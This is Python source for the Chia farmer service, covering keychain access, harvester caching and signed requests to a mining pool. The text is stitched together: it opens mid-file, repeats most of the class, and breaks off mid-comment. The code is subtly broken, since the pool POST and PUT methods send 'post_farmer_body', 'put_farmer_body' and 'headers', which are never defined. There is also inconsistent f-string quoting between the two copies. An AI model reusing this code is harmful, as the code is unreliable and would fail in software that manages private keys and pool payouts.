{} async def _start(self): await self.setup_keys() self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task()) self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task()) def _close(self): self._shut_down = True async def _await_closed(self): await self.cache_clear_task await self.update_pool_state_task def _set_state_changed_callback(self, callback: Callable): self.state_changed_callback = callback async def on_connect(self, peer: WSChiaConnection): # Sends a handshake to the harvester self.state_changed("add_connection", {}) handshake = harvester_protocol.HarvesterHandshake( self.get_public_keys(), self.pool_public_keys, ) if peer.connection_type is NodeType.HARVESTER: msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake) await peer.send_message(msg) def set_server(self, server): self.server = server def state_changed(self, change: str, data: Dict[str, Any]): if self.state_changed_callback is not None: self.state_changed_callback(change, data) def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str): self.log.error(error_message) self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append( ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict() ) def on_disconnect(self, connection: ws.WSChiaConnection): self.log.info(f"peer disconnected {connection.get_peer_info()}") self.state_changed("close_connection", {}) async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]: try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt()) ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /pool_info response: {response}") return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}" ) return None async def _pool_get_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey ) -> Optional[Dict]: assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) get_farmer_params = { "launcher_id": pool_config.launcher_id.hex(), "authentication_token": authentication_token, "signature": bytes(signature).hex(), } try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/farmer", params=get_farmer_params, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_post_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: post_farmer_payload: PostFarmerPayload = PostFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash()) post_farmer_request = PostFarmerRequest(post_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.post( f"{pool_config.pool_url}/farmer", data=post_farmer_body, headers=headers, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"POST /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in POST /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_put_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: put_farmer_payload: PutFarmerPayload = PutFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash()) put_farmer_request = PutFarmerRequest(put_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.put( f"{pool_config.pool_url}/farmer", data=put_farmer_body, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"PUT /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}" ) return None async def update_pool_state(self): config = load_config(self._root_path, "config.yaml") pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path) for pool_config in pool_config_list: p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash try: authentication_sk: Optional[PrivateKey] = await find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue if p2_singleton_puzzle_hash not in self.pool_state: self.authentication_keys[bytes(pool_config.authentication_public_key)] = authentication_sk self.pool_state[p2_singleton_puzzle_hash] = { "points_found_since_start": 0, "points_found_24h": [], "points_acknowledged_since_start": 0, "points_acknowledged_24h": [], "next_farmer_update": 0, "next_pool_info_update": 0, "current_points": 0, "current_difficulty": None, "pool_errors_24h": [], "authentication_token_timeout": None, } self.log.info(f"Added pool: {pool_config}") pool_state = self.pool_state[p2_singleton_puzzle_hash] pool_state["pool_config"] = pool_config # Skip state update when self pooling if pool_config.pool_url == "": continue enforce_https = config["full_node"]["selected_network"] == "mainnet" if enforce_https and not pool_config.pool_url.startswith("https://"): self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}") continue # TODO: Improve error handling below, inform about unexpected failures if time.time() >= pool_state["next_pool_info_update"]: # Makes a GET request to the pool to get the updated information pool_info = await self._pool_get_pool_info(pool_config) if pool_info is not None and "error_code" not in pool_info: pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"] pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL # Only update the first time from GET /pool_info, gets updated from GET /farmer later if pool_state["current_difficulty"] is None: pool_state["current_difficulty"] = pool_info["minimum_difficulty"] if time.time() >= pool_state["next_farmer_update"]: authentication_token_timeout = pool_state["authentication_token_timeout"] async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[bool]]: # Run a GET /farmer to see if the farmer is already known by the pool response = await self._pool_get_farmer( pool_config, authentication_token_timeout, authentication_sk ) farmer_response: Optional[GetFarmerResponse] = None farmer_known: Optional[bool] = None if response is not None: if "error_code" not in response: farmer_response = GetFarmerResponse.from_json_dict(response) if farmer_response is not None: pool_state["current_difficulty"] = farmer_response.current_difficulty pool_state["current_points"] = farmer_response.current_points pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL else: farmer_known = response["error_code"] != PoolErrorCode.FARMER_NOT_KNOWN.value self.log.error( "update_pool_farmer_info failed: " f"{response["error_code"]}, {response["error_message"]}" ) return farmer_response, farmer_known if authentication_token_timeout is not None: farmer_info, farmer_is_known = await update_pool_farmer_info() if farmer_info is None and farmer_is_known is not None and not farmer_is_known: # Make the farmer known on the pool with a POST /farmer owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) post_response = await self._pool_post_farmer( pool_config, authentication_token_timeout, owner_sk ) if post_response is not None and "error_code" not in post_response: self.log.info( f"Welcome message from {pool_config.pool_url}: " f"{post_response["welcome_message"]}" ) # Now we should be able to update the local farmer info farmer_info, farmer_is_known = await update_pool_farmer_info() if farmer_info is None and not farmer_is_known: self.log.error("Failed to update farmer info after POST /farmer.") # Update the payout instructions on the pool if required if ( farmer_info is not None and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower() ): owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) put_farmer_response_dict = await self._pool_put_farmer( pool_config, authentication_token_timeout, owner_sk ) try: # put_farmer_response: PutFarmerResponse = PutFarmerResponse.from_json_dict( # put_farmer_response_dict # ) # if put_farmer_response.payout_instructions: # self.log.info( # f"Farmer information successfully updated on the pool {pool_config.pool_url}" # ) # TODO: Fix Streamable implementation and recover the above. if put_farmer_response_dict["payout_instructions"]: self.log.info( f"Farmer information successfully updated on the pool {pool_config.pool_url}" ) else: raise Exception except Exception: self.log.error( f"Failed to update farmer information on the pool {pool_config.pool_url}" ) else: self.log.warning( f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}" f", check communication with the pool." ) except Exception as e: tb = traceback.format_exc() self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}") def get_public_keys(self): return [child_sk.get_g1() for child_sk in self._private_keys] def get_private_keys(self): return self._private_keys async def get_reward_targets(self, search_for_private_key: bool) -> Dict: if search_for_private_key: all_sks = await self.get_all_private_keys() stop_searching_for_farmer, stop_searching_for_pool = False, False for i in range(500): if stop_searching_for_farmer and stop_searching_for_pool and i > 0: break for sk, _ in all_sks: ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()) if ph == self.farmer_target: stop_searching_for_farmer = True if ph == self.pool_target: stop_searching_for_pool = True return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, "have_farmer_sk": stop_searching_for_farmer, "have_pool_sk": stop_searching_for_pool, } return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, } def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]): config = load_config(self._root_path, "config.yaml") if farmer_target_encoded is not None: self.farmer_target_encoded = farmer_target_encoded self.farmer_target = decode_puzzle_hash(farmer_target_encoded) config["farmer"]["xch_target_address"] = farmer_target_encoded if pool_target_encoded is not None: self.pool_target_encoded = pool_target_encoded self.pool_target = decode_puzzle_hash(pool_target_encoded) config["pool"]["xch_target_address"] = pool_target_encoded save_config(self._root_path, "config.yaml", config) async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str): for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items(): if launcher_id == pool_state_dict["pool_config"].launcher_id: config = load_config(self._root_path, "config.yaml") new_list = [] for list_element in config["pool"]["pool_list"]: if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id): list_element["payout_instructions"] = payout_instructions new_list.append(list_element) config["pool"]["pool_list"] = new_list save_config(self._root_path, "config.yaml", config) # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions pool_state_dict["next_farmer_update"] = 0 return self.log.warning(f"Launcher id: {launcher_id} not found") async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]: for pool_state in self.pool_state.values(): pool_config: PoolWalletConfig = pool_state["pool_config"] if pool_config.launcher_id == launcher_id: authentication_sk: Optional[PrivateKey] = await find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token_timeout = pool_state["authentication_token_timeout"] authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) return ( pool_config.pool_url + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}" f"&signature={bytes(signature).hex()}" ) return None async def update_cached_harvesters(self) -> bool: # First remove outdated cache entries self.log.debug(f"update_cached_harvesters cache entries: {len(self.harvester_cache)}") remove_hosts = [] for host, host_cache in self.harvester_cache.items(): remove_peers = [] for peer_id, peer_cache in host_cache.items(): # If the peer cache is expired it means the harvester didn't respond for too long if peer_cache.expired(): remove_peers.append(peer_id) for key in remove_peers: del host_cache[key] if len(host_cache) == 0: self.log.debug(f"update_cached_harvesters remove host: {host}") remove_hosts.append(host) for key in remove_hosts: del self.harvester_cache[key] # Now query each harvester and update caches updated = False for connection in self.server.get_connections(NodeType.HARVESTER): cache_entry = await self.get_cached_harvesters(connection) if cache_entry.needs_update(): self.log.debug(f"update_cached_harvesters update harvester: {connection.peer_node_id}") cache_entry.bump_last_update() response = await connection.request_plots( harvester_protocol.RequestPlots(), timeout=UPDATE_HARVESTER_CACHE_INTERVAL ) if response is not None: if isinstance(response, harvester_protocol.RespondPlots): new_data: Dict = response.to_json_dict() if cache_entry.data != new_data: updated = True self.log.debug(f"update_cached_harvesters cache updated: {connection.peer_node_id}") else: self.log.debug(f"update_cached_harvesters no changes for: {connection.peer_node_id}") cache_entry.set_data(new_data) else: self.log.error( f"Invalid response from harvester:" f"peer_host {connection.peer_host}, peer_node_id {connection.peer_node_id}" ) else: self.log.error( "Harvester did not respond. You might need to update harvester to the latest version" ) return updated async def get_cached_harvesters(self, connection: WSChiaConnection) -> HarvesterCacheEntry: host_cache = self.harvester_cache.get(connection.peer_host) if host_cache is None: host_cache = {} self.harvester_cache[connection.peer_host] = host_cache node_cache = host_cache.get(connection.peer_node_id.hex()) if node_cache is None: node_cache = HarvesterCacheEntry() host_cache[connection.peer_node_id.hex()] = node_cache return node_cache async def get_harvesters(self) -> Dict: harvesters: List = [] for connection in self.server.get_connections(NodeType.HARVESTER): self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}") cache_entry = await self.get_cached_harvesters(connection) if cache_entry.data is not None: harvester_object: dict = dict(cache_entry.data) harvester_object["connection"] = { "node_id": connection.peer_node_id.hex(), "host": connection.peer_host, "port": connection.peer_port, } harvesters.append(harvester_object) else: self.log.debug(f"get_harvesters no cache: {connection.peer_host}, node_id: {connection.peer_node_id}") return {"harvesters": harvesters} async def _periodically_update_pool_state_task(self): time_slept: uint64 = uint64(0) config_path: Path = config_path_for_filename(self._root_path, "config.yaml") while not self._shut_down: # Every time the config file changes, read it to check the pool state stat_info = config_path.stat() if stat_info.st_mtime > self.last_config_access_time: # If we detect the config file changed, refresh private keys first just in case self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self.last_config_access_time = stat_info.st_mtime await self.update_pool_state() time_slept = uint64(0) elif time_slept > 60: await self.update_pool_state() time_slept = uint64(0) time_slept += 1 await asyncio.sleep(1) async def _periodically_clear_cache_and_refresh_task(self): time_slept: uint64 = uint64(0) refresh_slept = 0 while not self._shut_down: try: if time_slept > self.constants.SUB_SLOT_TIME_TARGET: now = time.time() removed_keys: List[bytes32] = [] for key, add_time in self.cache_add_time.items(): if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3: self.sps.pop(key, None) self.proofs_of_space.pop(key, None) self.quality_str_to_identifiers.pop(key, None) self.number_of_responses.pop(key, None) removed_keys.append(key) for key in removed_keys: self.cache_add_time.pop(key, None) time_slept = uint64(0) log.debug( f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} " f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}" ) time_slept += 1 refresh_slept += 1 # Periodically refresh GUI to show the correct download/upload rate. if refresh_slept >= 30: self.state_changed("add_connection", {}) refresh_slept = 0 # Handles harvester plots cache cleanup and updates if await self.update_cached_harvesters(): self.state_changed("new_plots", await self.get_harvesters()) except Exception: log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}") await asyncio.sleep(1)
import asyncio import json import logging import time from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple import traceback import aiohttp from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey import chia.server.ws_connection as ws # lgtm [py/import-and-import-from] from chia.consensus.coinbase import create_puzzlehash_for_pk from chia.consensus.constants import ConsensusConstants from chia.daemon.keychain_proxy import ( KeychainProxy, KeychainProxyConnectionFailure, connect_to_keychain_and_validate, wrap_local_keychain, ) from chia.pools.pool_config import PoolWalletConfig, load_pool_config from chia.protocols import farmer_protocol, harvester_protocol from chia.protocols.pool_protocol import ( ErrorResponse, get_current_authentication_token, GetFarmerResponse, PoolErrorCode, PostFarmerPayload, PostFarmerRequest, PutFarmerPayload, PutFarmerRequest, AuthenticationPayload, ) from chia.protocols.protocol_message_types import ProtocolMessageTypes from chia.server.outbound_message import NodeType, make_msg from chia.server.server import ssl_context_for_root from chia.server.ws_connection import WSChiaConnection from chia.ssl.create_ssl import get_mozilla_ca_crt from chia.types.blockchain_format.proof_of_space import ProofOfSpace from chia.types.blockchain_format.sized_bytes import bytes32 from chia.util.bech32m import decode_puzzle_hash from chia.util.byte_types import hexstr_to_bytes from chia.util.config import load_config, save_config, config_path_for_filename from chia.util.hash import std_hash from chia.util.ints import uint8, uint16, uint32, uint64 from chia.util.keychain import Keychain from chia.wallet.derive_keys import ( master_sk_to_farmer_sk, master_sk_to_pool_sk, master_sk_to_wallet_sk, find_authentication_sk, find_owner_sk, ) from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD singleton_mod_hash = SINGLETON_MOD.get_tree_hash() log = logging.getLogger(__name__) UPDATE_POOL_INFO_INTERVAL: int = 3600 UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300 UPDATE_HARVESTER_CACHE_INTERVAL: int = 90 """ HARVESTER PROTOCOL (FARMER <-> HARVESTER) """ class HarvesterCacheEntry: def __init__(self): self.data: Optional[dict] = None self.last_update: float = 0 def bump_last_update(self): self.last_update = time.time() def set_data(self, data): self.data = data self.bump_last_update() def needs_update(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL def expired(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL * 10 class Farmer: def __init__( self, root_path: Path, farmer_config: Dict, pool_config: Dict, consensus_constants: ConsensusConstants, local_keychain: Optional[Keychain] = None, ): self.keychain_proxy: Optional[KeychainProxy] = None self.local_keychain = local_keychain self._root_path = root_path self.config = farmer_config self.pool_config = pool_config # Keep track of all sps, keyed on challenge chain signage point hash self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {} # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {} # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {} # number of responses to each signage point self.number_of_responses: Dict[bytes32, int] = {} # A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used # to periodically clear the memory self.cache_add_time: Dict[bytes32, uint64] = {} self.cache_clear_task: asyncio.Task self.update_pool_state_task: asyncio.Task self.constants = consensus_constants self._shut_down = False self.server: Any = None self.state_changed_callback: Optional[Callable] = None self.log = log async def ensure_keychain_proxy(self) -> KeychainProxy: if not self.keychain_proxy: if self.local_keychain: self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log) else: self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log) if not self.keychain_proxy: raise KeychainProxyConnectionFailure("Failed to connect to keychain service") return self.keychain_proxy async def get_all_private_keys(self): keychain_proxy = await self.ensure_keychain_proxy() return await keychain_proxy.get_all_private_keys() async def setup_keys(self): self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [ master_sk_to_pool_sk(sk) for sk in self.all_root_sks ] if len(self.get_public_keys()) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." raise RuntimeError(error_str) # This is the farmer configuration self.farmer_target_encoded = self.config["xch_target_address"] self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded) self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]] # This is the self pooling configuration, which is only used for original self-pooled plots self.pool_target_encoded = self.pool_config["xch_target_address"] self.pool_target = decode_puzzle_hash(self.pool_target_encoded) self.pool_sks_map: Dict = {} for key in self.get_private_keys(): self.pool_sks_map[bytes(key.get_g1())] = key assert len(self.farmer_target) == 32 assert len(self.pool_target) == 32 if len(self.pool_sks_map) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." raise RuntimeError(error_str) # The variables below are for use with an actual pool # From p2_singleton_puzzle_hash to pool state dict self.pool_state: Dict[bytes32, Dict] = {} # From public key bytes to PrivateKey self.authentication_keys: Dict[bytes, PrivateKey] = {} # Last time we updated pool_state based on the config file self.last_config_access_time: uint64 = uint64(0) self.harvester_cache: Dict[str, Dict[str, HarvesterCacheEntry]] = {} async def _start(self): await self.setup_keys() self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task()) self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task()) def _close(self): self._shut_down = True async def _await_closed(self): await self.cache_clear_task await self.update_pool_state_task def _set_state_changed_callback(self, callback: Callable): self.state_changed_callback = callback async def on_connect(self, peer: WSChiaConnection): # Sends a handshake to the harvester self.state_changed("add_connection", {}) handshake = harvester_protocol.HarvesterHandshake( self.get_public_keys(), self.pool_public_keys, ) if peer.connection_type is NodeType.HARVESTER: msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake) await peer.send_message(msg) def set_server(self, server): self.server = server def state_changed(self, change: str, data: Dict[str, Any]): if self.state_changed_callback is not None: self.state_changed_callback(change, data) def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str): self.log.error(error_message) self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append( ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict() ) def on_disconnect(self, connection: ws.WSChiaConnection): self.log.info(f"peer disconnected {connection.get_peer_info()}") self.state_changed("close_connection", {}) async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]: try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt()) ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /pool_info response: {response}") return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}" ) return None async def _pool_get_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey ) -> Optional[Dict]: assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) get_farmer_params = { "launcher_id": pool_config.launcher_id.hex(), "authentication_token": authentication_token, "signature": bytes(signature).hex(), } try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/farmer", params=get_farmer_params, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_post_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: post_farmer_payload: PostFarmerPayload = PostFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash()) post_farmer_request = PostFarmerRequest(post_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.post( f"{pool_config.pool_url}/farmer", data=post_farmer_body, headers=headers, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"POST /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in POST /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_put_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: put_farmer_payload: PutFarmerPayload = PutFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash()) put_farmer_request = PutFarmerRequest(put_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.put( f"{pool_config.pool_url}/farmer", data=put_farmer_body, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"PUT /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}" ) return None async def update_pool_state(self): config = load_config(self._root_path, "config.yaml") pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path) for pool_config in pool_config_list: p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash try: authentication_sk: Optional[PrivateKey] = await find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue if p2_singleton_puzzle_hash not in self.pool_state: self.authentication_keys[bytes(pool_config.authentication_public_key)] = authentication_sk self.pool_state[p2_singleton_puzzle_hash] = { "points_found_since_start": 0, "points_found_24h": [], "points_acknowledged_since_start": 0, "points_acknowledged_24h": [], "next_farmer_update": 0, "next_pool_info_update": 0, "current_points": 0, "current_difficulty": None, "pool_errors_24h": [], "authentication_token_timeout": None, } self.log.info(f"Added pool: {pool_config}") pool_state = self.pool_state[p2_singleton_puzzle_hash] pool_state["pool_config"] = pool_config # Skip state update when self pooling if pool_config.pool_url == "": continue enforce_https = config["full_node"]["selected_network"] == "mainnet" if enforce_https and not pool_config.pool_url.startswith("https://"): self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}") continue # TODO: Improve error handling below, inform about unexpected failures if time.time() >= pool_state["next_pool_info_update"]: # Makes a GET request to the pool to get the updated information pool_info = await self._pool_get_pool_info(pool_config) if pool_info is not None and "error_code" not in pool_info: pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"] pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL # Only update the first time from GET /pool_info, gets updated from GET /farmer later if pool_state["current_difficulty"] is None: pool_state["current_difficulty"] = pool_info["minimum_difficulty"] if time.time() >= pool_state["next_farmer_update"]: authentication_token_timeout = pool_state["authentication_token_timeout"] async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[bool]]: # Run a GET /farmer to see if the farmer is already known by the pool response = await self._pool_get_farmer( pool_config, authentication_token_timeout, authentication_sk ) farmer_response: Optional[GetFarmerResponse] = None farmer_known: Optional[bool] = None if response is not None: if "error_code" not in response: farmer_response = GetFarmerResponse.from_json_dict(response) if farmer_response is not None: pool_state["current_difficulty"] = farmer_response.current_difficulty pool_state["current_points"] = farmer_response.current_points pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL else: farmer_known = response["error_code"] != PoolErrorCode.FARMER_NOT_KNOWN.value self.log.error( "update_pool_farmer_info failed: " f"{response['error_code']}, {response['error_message']}" ) return farmer_response, farmer_known if authentication_token_timeout is not None: farmer_info, farmer_is_known = await update_pool_farmer_info() if farmer_info is None and farmer_is_known is not None and not farmer_is_known: # Make the farmer known on the pool with a POST /farmer owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) post_response = await self._pool_post_farmer( pool_config, authentication_token_timeout, owner_sk ) if post_response is not None and "error_code" not in post_response: self.log.info( f"Welcome message from {pool_config.pool_url}: " f"{post_response['welcome_message']}" ) # Now we should be able to update the local farmer info farmer_info, farmer_is_known = await update_pool_farmer_info() if farmer_info is None and not farmer_is_known: self.log.error("Failed to update farmer info after POST /farmer.") # Update the payout instructions on 